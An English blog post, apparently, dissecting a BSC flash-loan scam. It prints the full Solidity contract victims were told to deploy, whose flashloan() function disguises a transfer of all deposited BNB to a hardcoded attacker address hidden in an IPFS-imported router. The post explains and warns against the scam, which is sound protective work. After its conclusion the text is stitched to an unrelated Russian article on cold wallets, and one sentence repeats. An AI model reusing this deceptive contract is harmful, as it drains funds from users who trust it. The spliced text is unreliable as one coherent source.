Following the success of DeFi on Ethereum, Binance created a copy of the blockchain and, allegedly, funded multiple projects that copied most successful and advanced DeFi-projects of Ethereum. Everything looked fine until a cascade of hacks that targeted projects on BSC in the Spring of 2021.

Most of the attacks used a similar scheme:

1. A DeFi contract had a flaw in token balances calculation.

2. An attacker used a flash loan to inflate a token pool or vault.

3. The attacker then exploited the flaw by doing a big trade or token swap and tricking the contract into thinking that all balances were correct.

4. The flash loan was repaid and the attacker got away with some profit. So, for anyone who heard about those attacks it was hard to pass by (me included).

   So, for anyone who heard about those attacks it was hard to pass by (me included).

   Mechanics of the scam Author of the video shared how they managed to take a flash loan to make one arbitraging trade and earn several BNB (1 BNB costed around $400 back then). And, out of generosity, they shared the technique:

   Viewer was asked to deploy a smart contract that does all the job. To cover transaction fees, viewer was asked to deposit 0.25 BNB into the contract. The contract belonged to the viewer, so everything looked safe. Then, viewer needed to execute flashloan function of the contract. The author even uploaded the contract to Remix, an Ethereum online IDE, so viewer needed to only click a couple of buttons.

   It’s not hard to guess that everyone how followed the instructions lost the 0.25 BNB they deposited into the contract and got nothing in return. At the time of writing, more than 44 BNB (more than $17 500) were withdrawn from attacker’s address.

   How to identify the scam First thing that stands out is the 0.25 BNB fee: this is a very high transaction fee for BSC, you’d hardly ever submit a transaction that costs that much. Apparently, the attacker didn’t want it to be too suspicious and made the amount low enough to look like a real fee and big enough to satisfy their greed.

   Second, never ever run a contract if you don’t know how it works. Here’s the contract viewers were instructed to deploy (comments are added by its author):

   pragma solidity ^0.5.0;
   
   // PancakeSwap Smart Contracts
   import "https://github.com/pancakeswap/pancake-swap-core/blob/master/contracts/interfaces/IPancakeCallee.sol";
   import "https://github.com/pancakeswap/pancake-swap-core/blob/master/contracts/interfaces/IPancakeFactory.sol";
   
   //BakerySwp Smart contracts
   import "https://github.com/BakeryProject/bakery-swap-core/blob/master/contracts/interfaces/IBakerySwapFactory.sol";
   
   // Router
   import "ipfs://QmUSQQNWBJ6snmx5FvafDSBCPCy63BLTpwM61dYjRzwLkN";
   
   // Multiplier-Finance Smart Contracts
   import "https://github.com/Multiplier-Finance/MCL-FlashloanDemo/blob/main/contracts/interfaces/ILendingPoolAddressesProvider.sol";
   import "https://github.com/Multiplier-Finance/MCL-FlashloanDemo/blob/main/contracts/interfaces/ILendingPool.sol";
   
   contract InitiateFlashLoan {
     RouterV2 router;
     string public tokenName;
     string public tokenSymbol;
     uint256 flashLoanAmount;
   
     constructor(
       string memory _tokenName,
       string memory _tokenSymbol,
       uint256 _loanAmount
     ) public {
       tokenName = _tokenName;
       tokenSymbol = _tokenSymbol;
       flashLoanAmount = _loanAmount;
       router = new RouterV2();
     }
   
     function() external payable {}
   
     function flashloan() public payable {
       // Send required coins for swap
       address(uint160(router.pancakeSwapAddress())).transfer(
         address(this).balance
       );
   
       //Flash loan borrowed 3,137.41 BNB from Multiplier-Finance to make an arbitrage trade on the AMM DEX PancakeSwap.
       router.borrowFlashloanFromMultiplier(
         address(this),
         router.bakerySwapAddress(),
         flashLoanAmount
       );
   
       //To prepare the arbitrage, BNB is converted to BUSD using PancakeSwap swap contract.
       router.convertBnbToBusd(msg.sender, flashLoanAmount / 2);
   
       //The arbitrage converts BUSD for BNB using BUSD/BNB PancakeSwap, and then immediately converts BNB back to 3,148.39 BNB using BNB/BUSD BakerySwap.
       router.callArbitrageBakerySwap(router.bakerySwapAddress(), msg.sender);
   
       //After the arbitrage, 3,148.38 BNB is transferred back to Multiplier to pay the loan plus fees. This transaction costs 0.2 BNB of gas.
       router.transferBnbToMultiplier(router.pancakeSwapAddress());
   
       //Note that the transaction sender gains 3.29 BNB from the arbitrage, this particular transaction can be repeated as price changes all the time.
       router.completeTransation(address(this).balance);
     }
   }
   

Everything looks kind of ok:

1. Real PancakeSwap, BakerySwap, and Multiplier-Finance contracts are imported.

2. A router contract is imported (IPFS? huh?).

3. Then there’s flashloan function that sends contract’s ethers to a PancakeSwap address, borrows a flash loan from Multiplier-Finance, makes an arbitraging swap, pays out the loan, and finally returns some profit to the contract.

In fact, it does only one thing: it sends all BNB deposited into the contract, to attacker’s address. That IPFS import definitely looks suspicious and there’s a reason they used IPFS there: so it’s harder to get the Router contract and see what it’s doing.

The Router contract contains a lot of lines to make it noisy and hard to read but it’s not hard to find the only important part:

...

contract RouterV2 {
    ...
    function pancakeSwapAddress() public pure returns (address) {
        return 0x2593F13d5b7aC0d766E5768977ca477F9165923a;
    }

    ...
}

This is the address the main contract sends all funds to.

Conclusion This scam is an interesting case: most scams target non-tech savvy users of cryptocurrencies and this one targets those who are aware of flash loan attacks and who knows how to deploy smart contracts and how to interact with them directly. That is not a large audience but, as we can see, many people have still fell victims of the scam.

Горячий кошелек — это кошелек, который подключен к Интернету или когда-либо был подключен к нему. Одним из преимуществ горячих кошельков является то, что с их помощью можно совершать небольшие повседневные транзакции, однако использовать его для хранения большего количества криптовалюты не рекомендуется, так как он уязвим для атак, ведь абсолютное большинство атак проводятся в онлайне. Одним из наиболее распространенных типов горячих кошельков являются программные кошельки, о лучших их представителях у нас есть отдельная статья:

Холодный кошелек — это тип кошелька для криптовалюты, нацеленный на максимальную безопасность. В отличие от горячих кошельков, холодные кошельки оперируют приватными ключами только в безопасной среде, не подключенной к Интернету, что значительно повышается безопасность Ваших активов. Именно об этом типе кошельков мы сегодня и поговорим.

Холодные кошельки по своему строению могут быть программными и аппаратными, но суть у всех одна: холодный кошелек только подписывает транзакции, созданные на онлайн кошельке, которые затем транслируются в сеть так же при помощи онлайн кошелька.

Где еще могут понадобиться оффлайн транзакции, кроме как для обеспечения безопасности активов? Например, при совершении оффлайн сделок по покупке чего-то за криптовалюту или продажи криптовалюты. В такой ситуации будет правильным решением подготовить транзакцию заранее, а не приносить свой кошелек на саму встречу. В таком случае Вы не подвергаете себя риску возможной атаки гаечным ключом (камнем по голове и хищение кошелька) или компрометации конфиденциальной информации.

Программные кошельки, как следует из названия, являются просто программным обеспечением, которое позволяет совершать то самое взаимодействие с блокчейном.

С аппаратными кошельками всё куда интереснее, они представлены отдельными устройствами, которые являются защищенной изолированной средой для хранения приватных ключей, все действия подтверждаются непосредственно на самом устройстве, которое само по себе так же к Интернету не подключается, а для транслирования может использоваться компьютер или смартфон. При наличии аппаратного кошелька можно совершать транзакции даже на устройстве, доверху заполненном вирусами, и не волноваться о своей безопасности.

Схема работы программного холодного кошелька выглядит следующим образом. Необходимо наличие двух устройств, одно из которых подключено к интернету, а другое — нет и никогда не было.

Это могут быть, как компьютеры, так и смартфоны, примеры программного обеспечения для обоих типов устройств я дам чуть позже.

В таком случае Online-устройство работает в watch-only режиме, то есть режиме, который позволяет только наблюдать за балансом и не позволяет им оперировать.

Схема совершения исходящей транзакции с использованием холодного программного кошелька выглядит следующим образом.

Раз это оффлайн транзакции, логичным будет начать нашу деятельность с Offline-устройства. На Offline-устройство посредством накопителя (usb-флешки) доставляется программное обеспечение, которое и будет оперировать нашими приватными ключами.

На оффлайн устройстве создаётся кошелек.

Далее с Offline-устройства с помощью флеш-накопителя на Online-устройство переносится мастер-ключ для watch-only режима, с помощью которого мы сможем проводить наблюдение за балансом и создавать транзакции (неподписанные).

На Online-устройстве, синхронизированном с блокчейном, создаётся транзакция и в неподписанном виде передаётся на Offline-устройство. Затем транзакция подписывается на Offline-устройстве, в подписанном виде передаётся на Online-устройство и транслируется в сеть.